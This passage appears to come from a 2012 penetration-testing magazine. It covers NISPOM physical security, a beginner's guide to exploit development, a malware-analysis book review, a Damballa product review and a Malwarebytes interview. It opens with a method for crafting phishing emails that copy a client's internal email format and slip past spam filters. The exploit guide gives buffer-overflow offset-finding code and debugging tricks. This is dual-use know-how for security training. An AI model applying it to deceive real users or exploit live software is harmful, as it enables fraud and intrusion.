We get hold of an old internal email and use the same format to develop our phishing mail. We do not use any specific tools for it except Outlook to send it and Word to do proper table/layout work. It takes quite some time to get the message through the spam filter, as the complexity of the layout tables impacted the spam filter. We usually end up using a table and 3 graphics (client's logo, footer and header).

NISPOM

The Physical Aspects of Cybersecurity and Their Importance – NISPOM

As we continue our multi-part journey through the catacombs of physical security, we will examine more closely the National Industrial Security Program Operating Manual (NISPOM) and look at the strengths and weaknesses of what the United States Department of Defense set out as standards and methods for its contractor base.

This needs to be addressed from a high-level perspective, since the NISPOM is essentially policy by which the government sets the standards for its industrial base, the same industrial base that in return supports the mission of the US Government. Although written by the Defense Department, it is nevertheless subscribed to by all organizations doing work for the federal government.

As nearly 80% of all US government activities are outsourced, in accordance with the Office of Management and Budget Circular A-76, which obligates federal agencies to turn non-mission-oriented activities over to contractors, there had to be some standards and guidance, so NISPOM, or DoD 5220.22-M (the formal DoD nomenclature for NISPOM), became the de facto standard.

Essentially it comes down to being all about trust, and as such there are loopholes big enough to drive a truck through.

The Physical Reality

To refresh, the chapters we'll be discussing in this series of articles are from NISPOM as follows:

• Chapter 1 – General Provisions and Requirements
• Chapter 2 – Security Clearances
  • Section 1 – Facility Clearances
  • Section 2 – Personnel Security Clearances
  • Section 3 – Foreign Ownership, Control, or Influence (FOCI) [1]
• Chapter 3 – Security Training and Briefings
• Chapter 4 – Classification and Marking
• Chapter 5 – Safeguarding Classified Information
• Chapter 6 – Visits and Meetings
• Chapter 7 – Subcontracting
• Chapter 8 – Information System Security
• Chapter 9 – Special Requirements
  • Section 1 – RD and FRD
  • Section 2 – DoD Critical Nuclear Weapon Design Information (CNWDI)
  • Section 3 – Intelligence Information
  • Section 4 – Communication Security (COMSEC)
• Chapter 10 – International Security Requirements
• Chapter 11 – Miscellaneous Information
  • Section 1 – TEMPEST
  • Section 2 – Defense Technical Information Center (DTIC)
  • Section 3 – Independent Research and Development (IR&D) Efforts
• Appendices [2]

This week we'll outline the contents of each section in an abbreviated manner and through brief narrative; follow-on articles will then delve into highlighting weaknesses, vulnerabilities, threats and risk. This approach is applied because we first need to understand WHAT is said in order to analyze strengths and weaknesses.

Defense in Depth

The document as a whole is designed to "prescribe the requirements, restrictions, and other safeguards to prevent unauthorized disclosure of classified information." [3] That's it. Plain and simple. Exactly how it should be. The simpler the mission statement, the greater the likelihood it will be understood and executed properly. The beauty of this document is its simplicity; however, anyone who has ever written policy before is fully aware of how difficult it is to make something simple. That is why it is my belief and credo that "Words Matter".

The best way to establish a defense-in-depth policy is to use a three-ringed or tiered architecture model: simple, simpler, simplest. The KISS [4] principle is alive and well in all of NISPOM. And if you think about it, it has to be. The simpler the instructions, the greater the likelihood of having them followed correctly. True military style that would make Sun Tzu proud.

The document then discusses clearances relative to the sensitivity of classified material and the "need to know". Chapter 2 talks about setting up and maintaining a facility clearance, something granted to enable classified material to be managed throughout the entire physical area or certain areas. There are specific requirements such as signs and notices advising of the cleared area and, more often than not, no type of communication device is allowed unless the device itself has been classified and inspected, something we will get into when we talk about TEMPEST.

For a facility to be issued a facility clearance, enormous safeguards need to be put in place: from certain types of locks, to specifications of storage filing cabinets and combination locks, to the most important aspect, namely controlled access. A controlled access area is one in which everyone coming and going must sign in and show credentials equivalent to the level of information available for their review at that site.

The section continues by discussing how all personnel at a site must hold clearances in accordance with the information which they can access, both physically and virtually, on paper or on the computer.

At this point you might wonder who is watching. Well, besides cameras, sign-in and sign-out logs, badges, and embedded biometric systems, facilities are subject to audits at any time. These can come unannounced from the internal Facility Security Officer, or from the actual security service of the agency under which the contractor is performing their duties.

The last point to touch on relates to Chapter 2, Section 3 – Foreign Ownership, Control, or Influence (FOCI). Here's where it gets tricky.

"We all now realize that, contrary to the pronouncements of certain pundits, the world is not economically flat. But it is undeniable that its citizens and businesses are more economically connected than ever before. One manifestation of this interconnectedness is the increasing number of cross-border acquisitions of business enterprises. In most cases these transactions do not become the subject of public discussion or detailed government scrutiny. But when foreign entities seek to purchase U.S. government contractors who perform classified national security work and therefore hold facility security clearances ("FCLs"), the U.S. Government is anxious to know, among other things, the extent to which the company is the subject of foreign ownership, control or influence ("FOCI"). Being under FOCI can sound the death knell for a company's ability to perform classified work, with consequent loss of business that may be critical to the company's continued status as a going concern. But that outcome can often be avoided by development and submission of a FOCI mitigation plan which, if accepted either as submitted or modified, can enable the company to continue performance of national security work." [5]

That's how a foreign entity can serve a government agency and in fact hold a valid Facility Clearance. As I mentioned earlier, there are loopholes in NISPOM, and this is one of those areas; however, no foreign government is going to be foolish enough to invite the spotlight on itself by not following the policy and directives set forth in NISPOM.

There are, in fact, easier ways in which espionage occurs, and it does occur. But that is for later discussion in this series, when we look at the dark side of Facility Clearances and the what and how of counterintelligence.

Annotations
[1] Highlight indicates the areas to be discussed in this installment of The Physical Aspects of Cybersecurity and Their Importance – NISPOM.
[2] http://en.wikipedia.org/wiki/NISPOM, downloaded 17 June 2012.
[3] NISPOM Chapter 1, General Provisions and Requirements.
[4] For those unfamiliar with the KISS principle, it has nothing to do with the band, but rather is an acronym for "keep it simple, stupid".
[5] Government Contracts Law Blog, http://www.governmentcontractslawblog.com/articles/nispom/, downloaded 22 July 2012.

MARC GARTENBERG
Marc Gartenberg has been involved in the security arena for over 25 years. He has served as a consultant to over 12 US Government Agency Senior Executives in areas relating to Cybersecurity and Information Assurance posture, and has served as Chief of Global Technology Training for the US Department of State. He has been a contributing columnist for Computerworld Security and has lectured at numerous conferences, universities, and technical institutes across the Former Soviet Union, including the regions of Central Asia and Western Siberia.
Questions welcomed at: [email protected]
Information: NISPOM Portal: http://www.nispom.org/NISPOM-download.htm

EXPLOITATION FRAMEWORKS

Exploitation Techniques: How You Should Start

Have you ever dreamed about writing your own 0day exploit? I really want to do it, and I work hard to learn everything I can about it. This article is about the experiences I have had so far in learning about exploit techniques, and I want to share some of the noteworthy sources I stumbled upon in order to support other beginners.

This is not a guide on "how to find an 0day", because that's something I don't know myself, but at the very least I can give you a good starting point. First of all, you have to understand that exploiting is like science; it's a never-ending process, which requires patience, reverse engineering, tinkering, and researching. And there is always something you don't know or understand.

The most important thing

The most important thing I recognized was that there are no black boxes or borders between the topics. You have to understand, connect, and relate each layer and component to another. For example, solving keygenmes with OllyDbg on Windows helped me to understand how to read assembler, which then helped me to analyze binaries on Linux with gdb. So don't restrict yourself to one topic: be open-minded. I will now introduce some tutorials and exercises I found.

Lena's Reversing for Newbies (http://tuts4you.com/download.php?list.17) – This is a video tutorial series which is really nice for starting to learn about working with a debugger and understanding the asm code flow. The instructions are very detailed and very easy to understand. This is definitely a very good start.

crackmes.de – It's a community with a lot of crackmes/keygenmes, very often with step-by-step instructions, for any skill level. And when you feel confident, try an unsolved crackme, solve it and support others by providing a tutorial for it.

io.smashthestack.com – It is a wargame where you try to escalate out of each level by exploiting or solving a lot of different and creative problems. It's an awesome feeling when the shell of the next level pops up after you have spent hours of tinkering. I'm currently at level 13 and I've learned so much. There are not only standard exploit exercises like buffer overflows or format strings, but also side-channel attacks, cryptographic algorithms and much more.

exploit-exercises.com – It offers virtual machines with a lot of challenging levels. They do not offer solutions, but you can find a lot of really good write-ups in various blogs. It's very nice to train your skill and challenge yourself with the next level. It also has the advantage that it runs on your own machine, which is much faster.

binary-auditing.com – It has a lot of exercise binaries for learning to reverse engineer software with IDA Pro. There are easy examples such as "what does a function call in C look like" and "what happens when you create loops", but also more complex binaries, for example reversing malware.

corelan.be – It has a lot of really good articles about exploiting. They also offer live training, which I can't pay for as a student, but I read that it is really good. Nevertheless, their public tutorials are great for a beginner.

exploit-db.com – It is an exploit database I want to use for my next step: learning about exploiting by understanding already implemented and functional exploits.

The Shellcoder's Handbook – It is a nice book which teaches you the basic exploit techniques step by step. I found it more fun to learn and discover these techniques on my own, but it's obviously good guidance with probably quicker success. However, I've started to read it now.

IRC – IRC channels are great places where people with the same interests hang around. Be on the lookout for channels on your favorite websites, join them and support each other.

Problems

You will definitely run into many, many problems. I want to give you some examples of those which I ran into and show what I learned from them.

There is one task you often have to do, and this is getting the right offset to place your addresses or instructions. This is often done with a trial and error approach, but Metasploit has two really handy scripts in the tools directory – `pattern_create.rb` and `pattern_offset.rb`:

## create a pattern ##
msf/tools # ./pattern_create.rb 40
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2A

## use the created pattern as your malicious input ##
Program received signal SIGSEGV, Segmentation fault.
0x41326241 in ?? ()

## and you can calculate the offset ##
msf/tools # ./pattern_offset.rb 0x41326241 40
36

The crash address is the pattern bytes that overwrote the saved return address: 0x41326241 is the bytes 41 62 32 41, which in little-endian memory order read "Ab2A", and those four characters start at offset 36 of the pattern.
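The same two tools reimplemented in Python, as an added example that is not Metasploit's code: it reproduces the 40-byte pattern and the 0x41326241 → 36 result from the session above, accepts the crash value as a register value, a hex string or the literal bytes, and refuses to build a pattern longer than the 20280 bytes after which the three-byte triplets repeat and an offset stops being unique (the Metasploit script wraps around there instead).

```python
"""Cyclic pattern tools: a Python version of what pattern_create.rb and
pattern_offset.rb do. Added example, not Metasploit's code."""
from string import ascii_lowercase, ascii_uppercase, digits
from typing import Optional, Union

# After 26 * 26 * 10 three-byte triplets the pattern would start to repeat,
# and a 4-byte value could then match more than one offset.
MAX_UNIQUE_LENGTH = 26 * 26 * 10 * 3   # 20280


def pattern_create(length: int) -> str:
    """Build Aa0Aa1Aa2...: every 3-byte triplet (upper, lower, digit) is unique,
    so any 4 bytes taken from the pattern identify exactly one offset."""
    if length > MAX_UNIQUE_LENGTH:
        raise ValueError("patterns over %d bytes repeat; offsets would be ambiguous"
                         % MAX_UNIQUE_LENGTH)
    triplets = []
    for u in ascii_uppercase:
        for l in ascii_lowercase:
            for d in digits:
                triplets.append(u + l + d)
                if len(triplets) * 3 >= length:
                    return "".join(triplets)[:length]
    return "".join(triplets)[:length]


def pattern_offset(value: Union[int, str, bytes], length: int,
                   endian: str = "little") -> Optional[int]:
    """Find where a crash value sits in the pattern of the given length.

    value may be the register value as an int or a '0x...' string (decoded in
    memory order, little-endian on x86, so 0x41326241 becomes b'Ab2A'), or the
    literal text/bytes that landed in the register. Returns None if not found."""
    if isinstance(value, str) and value.lower().startswith("0x"):
        value = int(value, 16)
    if isinstance(value, int):
        width = 8 if value > 0xFFFFFFFF else 4
        needle = value.to_bytes(width, endian)
        if width == 8:
            # a 64-bit register that only partly holds pattern bytes is zero-padded
            needle = (needle.rstrip(b"\x00") if endian == "little"
                      else needle.lstrip(b"\x00"))
    elif isinstance(value, str):
        needle = value.encode("ascii")
    else:
        needle = bytes(value)
    pos = pattern_create(length).encode("ascii").find(needle)
    return None if pos < 0 else pos


if __name__ == "__main__":
    print(pattern_create(40))              # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2A
    print(pattern_offset(0x41326241, 40))  # 36
```

If pattern_offset() returns None, the register did not get pattern bytes at all (the value was read big-endian, the input was mangled by the target, or a different buffer was overflowed), which is worth knowing before spending time on the offset.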

Another big problem for me was the changing environment. For example, I created an exploit and it worked while I observed the binary with gdb, but it didn't work without gdb. This happens because gdb changes the environment of the program it runs (it adds variables such as LINES and COLUMNS), and since the environment strings sit at the top of the stack, a different environment size shifts every stack address. There are many different possibilities to get more control over your execution, and I only know a few.

## unset the environment variables in gdb ##
(gdb) unset env
Delete all environment variables? (y or n) y

## run programs without environment variables ##
env -i /bin/sh
sh-3.2$ env
PWD=/tmp
_=/usr/bin/env

Another example of controlling the environment, which can be important for race conditions or side-channel attacks, is the number of CPUs used.

## run the exploit only on the first CPU ##
taskset 0x00000001 ./exploit

Conclusion

Learning about exploiting is fascinating. On the way you learn so much about the machine you use from day to day. Learning it by playing wargames and communicating with others is a lot of fun and a nice feeling. It will definitely broaden one's mind. After all, what else feels cooler than seeing a root shell spawn from your handcrafted input?

FABIAN "@SAMUIRAI" FAESSLER
Fabian "@samuirai" Faessler is a Computer Science student from Germany and an active contributor and member of shackspace (the Stuttgart Hackerspace – http://shackspace.de/).
Email: [email protected]
www.smrrd.de
Twitter: @samuirai

REVIEW

Practical Malware Analysis: The Hands-on Guide to Dissecting Malicious Software

Have you ever wanted to reverse engineer malware to see exactly what it does when it infects its host? To understand how malware propagates, or even understand the malware enough to write custom signatures for your IDS/IPS to save your network? If any of these sound interesting and exciting, this is the book for you.

It is a true learning experience from start to finish and I would highly recommend this book to anyone with an interest in malware analysis.

This book delivers valuable lessons with practical challenges, delivered in hands-on labs, and it will not disappoint.

This book is well organized and is laid out in six parts, starting with the basics and building up to shellcode and C++ analysis. It provides value to anyone with a passion to learn malware analysis, but individuals with prior high- and low-level programming knowledge will find the most immediate benefits. The publication is focused on the Windows operating system, but the techniques can be applied on your OS of choice.

Part 1 focuses on building a solid foundation with an introduction to basic analysis, covering both static and dynamic analysis as well as building a lab for malware analysis in a safe location. Chapter 1 introduces us to the basics of static analysis through the use of tools, discussions of packed and obfuscated code, and how and what to look for in linked libraries (DLL files), then brings it all together with a walkthrough of a malware sample. Chapter 2 gets into the all-important lab discussions: what you need to know about malware analysis and how to keep your network safe. The author gives recommendations as well as the pros and cons of different lab setups (you will want to pay attention here if you want to keep the systems around your analysis workstation infection free). Chapter 3 picks up where chapter 1 ended, with basic dynamic analysis, teaching us about sandboxes and the tools used for system monitoring when the target malware is run on our workstation.

Chapter 4 leads us into part 2, delivering a crash course in x86 disassembly, including discussions about heaps and stacks, registers, flags, function calls and more. Chapter 5 is all about IDA Pro, a very common and powerful disassembler, which makes it the de facto standard for hobbyists and professionals alike. Throughout this chapter the author explores many of the powerful features of IDA Pro and explains some functionality that will greatly help any malware analyst in their quest. Chapter 6 is a great chapter, as the author explains how to recognize C code constructs in assembly, which greatly reduces the number of instructions that we must analyze to get a high-level picture of what the suspect code is doing. Chapter 7 provides us a glimpse of Windows programming with an overview of the Windows API, registry, network APIs, kernel- and user-mode functions, and then wraps up with the Native API, which takes us into part 3 – advanced dynamic analysis.

Chapter 8 describes debugging with the use of debuggers and how they can be used to walk through a program. Chapter 9 focuses on another very commonly used freeware tool called OllyDbg, which is an x86 debugger. Here you will be given a tour of the GUI, highlighting key functions within the interface. Chapter 10 explains a less popular debugger by Microsoft that goes by the name of WinDbg. Even though this application is not as preferred as other tools, it does have some unique features that can be used for kernel-mode debugging.

Now that we have made it to part 4, chapter 11 switches focus from malware analysis to malware behavior, examining downloaders/launchers, backdoors, RATs, botnets, and keyloggers, to name a few. Chapter 12 covers launching covert malware and how to discover the code constructs that will lead us to the launching techniques that were deployed. Chapter 13 dives into the data encoding methods that attackers use to hide the true functionality of the malicious application. These techniques range from simple encoding to more sophisticated custom schemes. Chapter 14 helps us develop signatures for network-based countermeasures by observing data produced by the suspected malware sample.

Chapter 15 kicks off part 5 of our journey with a discussion of anti-disassembly and how to identify these techniques, navigate around them, and possibly defeat them. Chapter 16 continues the discussion of anti-reverse-engineering techniques with anti-debugging. Chapter 17 concludes the discussion of anti-analysis techniques with anti-VM techniques; these are used to evade analysis on virtual machines, which are commonly used by malware analysts to safely conduct dynamic analysis of malicious code. Chapter 18 talks about packers and how they work, detection of packed programs and unpacking malware with both automated and manual techniques.

This brings us to the last part of the book, focusing on more advanced analysis methods, which include shellcode, C++, and 64-bit analysis. Chapter 19 describes shellcode dissection and handling, as shellcode is usually no more than a binary chunk of data that does not run as a typical executable. Chapter 20 teaches us how to identify basic C++ features in assembly language and the challenges that this brings into the analysis process. Chapter 21 (the final chapter) touches on 64-bit malware and the minor differences between 32-bit and 64-bit malware analysis.

You will find Appendix B of this book to be a great resource, with a list of commonly used tools for malware analysis, a description of each tool, and a link to download the application. In my opinion, what makes this book so great and different from any other book on malware analysis that I have seen to date are the labs at the end of each chapter, with detailed answers in Appendix C. There is a lot of information in this book to digest, and it may overwhelm a newer analyst at first, but you cannot ask for a better source for learning how to become proficient in this field. This book is a comprehensive manual to the art of malware analysis. Again, I would highly recommend it to anyone who wants to gain or supplement their current skills and knowledge to become a successful malware analyst. As a side note, the author will be teaching a lot of these same techniques in a class at the Black Hat USA 2012 conference.

Review by Jeff Weaver

REVIEW

Damballa is a network security company fo-cused on protecting enterprise, ISP and telecommunications networks against ad-

vanced cyber threats, such as advanced malware, APTs, zero-day targeted attacks, and botnets. Dam-balla has been in the market since 2006, the time when APTs and malware were at their naïve states, and the threats could be mitigated with less bud-get flows and pains. Anticipating the growing threat, the company has evolved, developed and refined the Damballa Failsafe solution to stay ahead of the changing threat landscape. Damballa Failsafe is a real-time identification and termination solution for zero-day targeted attack activity that takes place in-side enterprise networks. It is one of the most ap-propriate solutions to address these specific issues and gaps in traditional security.

Compared to malware analysis products that only identify malware entering networks, Dambal-la Failsafe goes the extra mile by identifying ac-tual compromised endpoints. This approach sig-nificantly reduces false positives and streamlines remediation. Many networks have either been at-tacked in the past or are not even aware of their current compromised situation. Damballa Failsafe is rightly tailored to give a wide range of network compromise statistics over a singular dashboard. It detects malicious software and malicious com-

munications, correlates threat behaviors, pinpoints live infections, it then ranks infected assets by se-verity so organizations can dispatch resources ef-fectively.

Based on my experience with Damballa Failsafe (v5.0), I definitely believe that this solution fills the gaps that traditional prevention technology leaves and goes beyond what most malware protection systems are able to provide today. This special-ized threat protection solution is built specifically to identify active hidden threats in a corporate net-work by utilizing an array of patent-pending tech-nologies. It has the capability that:

• Automatically detects and analyzes suspicious executable and PDF files entering the network to uncover zero-day and unknown malware.

• Rapidly identifies command & control (C&C) behaviors and criminal traffic on enterprise networks.

• Correlates the malware and communications evidence to immediately pinpoint live infec-tions.

• Terminates the criminal communications to stop data theft and cyber espionage.

• Delivers full forensic evidence and playback of events in sequence to provide actionable intel-ligence to help remediate a breach.

Damballa Failsafe More Than a Malware Protection System

Advanced malware, persistent threats (APTs), and zero-day targeted attacks are the buzz of today’s security industry. Big and small corporates to vast infrastructures or SMEs are all victims to these stealthy targeted attacks.

Page41 http://pentestmag.com08/2012 (16) August

Key Features

Active Threat Monitoring
Damballa Failsafe sensors monitor traffic at all the perimeter points, including the egress, proxy/gateways, and the outbound DNS requests (see Figure 1). It then utilizes its machine intelligence code to find behavior anomalies in the traffic. This is critical to identifying potential threats and tracking their behavior in the network, and/or to isolating the infected host machines.

Damballa Failsafe utilizes anomaly detection algorithms along with suspicious activity ratings but requires no malware signatures to identify suspicious criminal traffic. Being able to detect malicious network traffic without signatures makes Damballa Failsafe a best-of-breed solution for early detection of malicious activities.

Threat Conviction Engine
Instead of alerting on any one behavior, Damballa Failsafe utilizes its Threat Conviction Engine to correlate threat behaviors in the network and confirm breaches on endpoints. Behaviors such as suspicious files downloaded, malicious DNS queries, domain fluxing and other automated behaviors are tracked, treating each as a piece of evidence of an endpoint being infected. They are weighted and scored, yielding a threat conviction score for any particular endpoint in the network. As enterprises embrace non-Windows devices and platforms in the network (such as Mac, iPad), confirming malware infections on endpoints becomes important to avoid unnecessary alerts. The correlation of behaviors seen and generation of a threat conviction score virtually eliminates false positives.

Asset Risk Factors
A very important and useful feature found in Damballa Failsafe is the Asset Risk Factor. This feature assesses the relative risk the infected endpoint represents to your specific enterprise based on the activity it performed on the endpoint and in the local network. Some factors in determining risk include:

• Number of connections and successes
• Reputation ratings of the domains
• Amount of data transferred, inbound/outbound, for a session state
• Number of malware instances on an endpoint
• Anti-virus coverage
• Asset profile rating

It is one thing to know that you have an outbreak of SpyEye; it is quite another to know that five of the 20 infected devices have been successful in establishing communications with criminal operators, have access to intellectual property and sit in a sensitive location in your network.

In the event of a breach, the dashboard is capable of highlighting the criticality as per the asset. For example, the CTO’s laptop infected with malware and successfully connected to command-and-control servers may have a higher rating than a consultant’s machine infected with the same malware. This feature prioritizes the pipeline of the IT administrator and/or security incident manager in charge.

Figure 1. Damballa Failsafe: Hunts for Advanced Malware, Persistent Threats and Targeted Attacks in Corporate Networks
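The conviction-then-prioritize idea described above (correlating several weak behaviors into one conviction score, then weighting it by asset risk factors such as C&C successes, domain reputation, data volume and asset profile) as an added illustrative model. This is not Damballa’s code; the behavior weights, risk weights, threshold and the sample endpoints (the CTO laptop versus a consultant machine) are constructed for this example.

```python
"""Illustrative threat-conviction and asset-risk triage.

Added example for this review: it is not Damballa's code. The behaviour
weights, the asset-risk weights, the threshold and the sample endpoints
are all constructed here to show how correlating several weak pieces of
evidence (rather than alerting on one) and weighting the result by asset
risk produces a prioritised list for the incident manager.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Evidence weights per observed behaviour (constructed values).
EVIDENCE_WEIGHTS: Dict[str, float] = {
    "suspicious_download": 0.25,     # suspicious executable/PDF fetched
    "malicious_dns_query": 0.30,     # lookup of a known-bad domain
    "domain_fluxing": 0.35,          # rapid cycling through generated domains
    "automated_beaconing": 0.30,     # machine-like periodic callbacks
    "cnc_connection_success": 0.45,  # completed session with a C&C server
}

# Score at or above which an endpoint is treated as a confirmed infection (constructed).
CONVICTION_THRESHOLD = 0.75


@dataclass
class Asset:
    """Per-endpoint observations feeding the risk factor (fields mirror the article's list)."""
    host: str
    profile_rating: float           # 0..1 sensitivity of the asset/owner (CTO laptop ~ 1.0)
    av_coverage: bool               # anti-virus present and current
    malware_instances: int          # distinct malware instances seen on the endpoint
    cnc_connections: int            # attempted C&C connections
    cnc_successes: int              # of which succeeded
    worst_domain_reputation: float  # 0.0 = known-bad, 1.0 = clean
    bytes_out: int                  # outbound data volume for the session
    evidence: List[str] = field(default_factory=list)


def conviction_score(evidence: List[str]) -> float:
    """Combine independent behaviours into one score in [0, 1].

    Each behaviour is a probability-like weight; combining them as
    1 - prod(1 - w) means no single behaviour convicts an endpoint, while
    several corroborating ones push the score past the threshold.
    """
    residual = 1.0
    for kind in evidence:
        residual *= 1.0 - EVIDENCE_WEIGHTS.get(kind, 0.0)
    return round(1.0 - residual, 4)


def asset_risk_factor(asset: Asset) -> float:
    """Weight the article's risk factors into a single 0..1 value (constructed weights)."""
    success_ratio = asset.cnc_successes / asset.cnc_connections if asset.cnc_connections else 0.0
    score = 0.35 * asset.profile_rating
    score += 0.25 * success_ratio
    score += 0.15 * (1.0 - asset.worst_domain_reputation)
    score += 0.10 * min(asset.malware_instances, 5) / 5
    score += 0.10 * min(asset.bytes_out / 50_000_000, 1.0)  # saturate at 50 MB outbound
    score += 0.05 * (0.0 if asset.av_coverage else 1.0)
    return round(score, 4)


def triage(assets: List[Asset]) -> List[Tuple[str, float, float, float]]:
    """Return (host, conviction, risk, priority) for convicted endpoints, highest priority first."""
    ranked = []
    for a in assets:
        conviction = conviction_score(a.evidence)
        if conviction < CONVICTION_THRESHOLD:
            continue  # suspicious but not confirmed: no alert, no noise
        risk = asset_risk_factor(a)
        ranked.append((a.host, conviction, risk, round(conviction * risk, 4)))
    ranked.sort(key=lambda t: t[3], reverse=True)
    return ranked


# Constructed sample: the article's CTO laptop vs consultant machine with the same
# malware, plus a host that only fetched one suspicious file.
SAMPLE_ASSETS = [
    Asset("cto-laptop", 1.0, True, 1, 20, 18, 0.1, 120_000_000,
          ["suspicious_download", "malicious_dns_query", "domain_fluxing",
           "cnc_connection_success"]),
    Asset("consultant-pc", 0.3, True, 1, 20, 0, 0.1, 0,
          ["suspicious_download", "malicious_dns_query", "domain_fluxing",
           "automated_beaconing"]),
    Asset("kiosk-07", 0.1, False, 0, 0, 0, 0.8, 0, ["suspicious_download"]),
]

if __name__ == "__main__":
    for host, conviction, risk, priority in triage(SAMPLE_ASSETS):
        print(f"{host:14s} conviction={conviction:.4f} risk={risk:.4f} priority={priority:.4f}")
```

Both infected machines are convicted, but the CTO laptop with successful C&C sessions and large outbound volume sorts first, while the single-download host never produces an alert.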

Sensors and Real-Time Cloud Updates
Damballa Failsafe incorporates the early warning capabilities of Damballa FirstAlert to discover criminal infrastructure used by emerging cyber threats weeks or months before the malware samples are first seen by the rest of the security industry. Damballa Failsafe sensors are like spy agents spread across multiple networks with access to millions of traffic packets around different geo-locations. These sensors monitor and give suspicion ratings to the domains, binaries and/or IP addresses. These findings are cumulatively monitored across the globe and uploaded to the Damballa cloud for additional analysis. By combining this early-warning intelligence with observed activity in a customer network, Damballa can pinpoint infected assets long before other traditional security solutions become aware of the threat. Therefore, with this early warning capability, Damballa Failsafe has an edge over other advanced threat detection technologies.

Deep Packet Inspection
The key feature on which everything relies is its deep packet inspection (DPI) engine, which is multi-layered and has a very low false positive and false negative rate. Most of the industry-standard DPI engines rely on specific signatures of known binary samples; therefore, the timeline to detect unknown or zero-day code is too long to save cutting-edge and mission-critical corporations. With Damballa Failsafe, the sensors are capable of detecting threats by utilizing behavior anomalies in the traffic, as well as binary analysis of the downloaded files. It includes:

• Automated Malware Analysis – detecting and capturing suspicious executables and PDFs, identifying if they are malicious, and analyzing them at Damballa Labs in real-time to profile their C&C communication behavior and provide host forensic details.

• Behavioral Analysis – tracking the behavior of the asset's communications – identifying if certain communications seem automated or act more like a human.

• Profiling Communications – analyzing network traffic to determine if the destination is suspicious, known to be C&C, has a low reputation or is generally shady.

Figure 2. Damballa Dashboard featuring Asset Risk Factor, Threat Conviction Score, Threat Description and Malicious Behavior Detail


Damballa Failsafe does not remove or quarantine malware, or infected systems, but it can be leveraged to provide assistance in isolating the resource in a vast segregated network. The appliance does have a feature to block specific command-and-control (C&C) communications by redirecting traffic or session interruption so the infected machine can’t communicate with its respective C&C.

Cloud Binary Analysis
During review of the Damballa Failsafe appliance, I was pleased to see an excellent binary analysis feature. The present version supports validating binary files that are downloaded over the network, which can be analyzed down to a granular view of the system changes they will perform on installation. It shows the file and registry changes on a Windows system. This cloud binary analysis helps in identifying the post-installation effects and system configuration changes. It also helps in identifying malicious programs (if any). In future versions of Damballa Failsafe, a feature to upload “your binary” will also be included for runtime analysis of existing or non-network (like CD and USB) transferred files.

Malicious File Detection
Damballa Failsafe with its current technology supports malware detection using intelligent machine codes which take into account the traffic (TCP, DNS) and the targeted domains with suspicion ratings. Once a file has been tagged as malicious, it is given a name using three words (ex. HighTideSnap) and is continuously monitored against the standard anti-malware solutions. Once the suspicious file is confirmed as known malware, its common industry name is displayed within parentheses (ex. HighTideSnap (KeyLog.Genx)). This is a remarkable feature showing the product’s power and efficiency. It can detect malware using intelligent machine code well before the standard anti-malware companies even tag it. Thus, it is recommended for intelligent zero-day detection.

Summary
With a comprehensive list of features, and the capability to look into the network and analyze behaviors, Damballa Failsafe is highly recommended to all CISOs who wish to be on the bleeding edge of security, and stay current on recent advances in anomaly detection and behavior analysis.

Reviewer: Rishi Narang


INTERVIEW


Some might call me a security expert...
Interview with Marcin Kleczynski, CEO of Malwarebytes

He started as a computer technician. Frustrated with criminal software, he worked on a simple tool. This tool has been downloaded 200 million times and he is the CEO of a company that stops advanced malware hands down. What is more, he claims his team can make a computer stand on its head and dance. He has got a pilot’s license and is not afraid of the Polar Plunge. You cannot miss this interview!

Aby Rao: Please, tell us a little bit about yourself and how you got into security?
Marcin Kleczynski: The initial idea for Malwarebytes came about in 2004 when I was working as a computer technician, fixing home computers. Obviously, a massive part of this was mending computers which had some kind of malware or virus causing them trouble. I would spend hours trying to remove stubborn, troublesome criminal software. It was here that it all started.

Why malware and how did Malwarebytes come into being?
In my computer technician days, the one thing that became more and more apparent to me was that there was a massive amount of criminal software still sneaking past existing antivirus software, stealing personal details and sometimes completely wrecking computers. The defining moment came when, despite my laptop running up to date antivirus software from a major vendor, it too became infected. I had to go onto security forums to seek a solution and that took more than three days. It then struck me – surely, if I was having this problem as a technician, there must be millions more like me. That was when I first started working on the early version of Malwarebytes Anti-Malware, at the time a simple tool designed to counteract the really troublesome malware which defeated existing antivirus. This was released in 2008, became more complex and really popular and the rest is history.

How big is Malwarebytes and how involved are you with employing new team members? Also, what are some of the fundamental skills you look for in your employees?
Malwarebytes has now been downloaded nearly 200 million times and has removed billions of pieces of malware around the world. The team is continually growing to support this demand, so we are always looking for good people who have knowledge of the very latest malware trends. For this reason, a lot of our research team is recruited directly from security forums. One of our latest hires has even worked with the Department of Defense – counteracting attempts at cyber-espionage. I am still very involved in the recruiting of team members I feel would contribute greatly to our cause.

There are some really big players in the malware market. How do you see Malwarebytes competing with those companies?
Malwarebytes often works best when it is used in conjunction with traditional antivirus software, so it’s not necessarily a case of being directly competitive. We stop a lot of the threats that these companies miss. We like to say we are ‘complementary’ to the traditional antivirus vendors.

From a marketing perspective we obviously struggle to compete with the massive marketing budgets these guys have, but when it comes to stopping advanced malware there is no competition, we win hands down.


Many small businesses think that their security is not targeted because of their size. What are your thoughts?
Small businesses are just as much at risk as anyone else, if not more so. These companies still hold a lot of sensitive information and therefore will always be a target. The real problem you have with small businesses is that there is often not a dedicated security person, so it can be a bit like the Wild West, with users undertaking all manner of risky practices. Additionally, these companies may not have a budget designed to support software to protect them.

Do you consider yourself a security expert or a security leader or both and why?
Some might call me a security expert, but sometimes when I see some of the things that my research teams are individually capable of, I think I know very little! Those guys could make a computer stand on its head and dance.


How does your software deal with zero-day attacks?
Stopping zero-day attacks is the whole point of Malwarebytes. Our technology is not reliant on detecting signatures, rather behaviors, so we catch malware by recognizing HOW it is trying to infect a computer. This is called heuristics – which in its simplest form means it spots patterns of behavior. This means we can identify and block entire families of malware, or even future mutations with a smaller team and more efficient engine.

I am certain a lot of our readers find malware security fascinating; how can someone start their career in this field?
Security forums are the best place to learn about the details of the industry from a technical point of view. Online communities like SpywareInfoForum.com are where I started.

How are some of the new media such as social networks and mobile technology used to spread malware?
Whenever you have a lot of people using a particular type of technology it is targeted by cyber-criminals, from ARPANET, through to floppy disk, Windows and now social media. Facebook and Twitter are now massive so they have become a prime distribution mechanism for cyber-criminals. In addition, the most effective forms of malware are ones that prey on the weakest link, people, so social media is a massive contributory factor in this. Mobile malware has been slower to catch on because mobile networks are generally more locked down, however it won’t be long before we see the first mass piece of mobile malware.

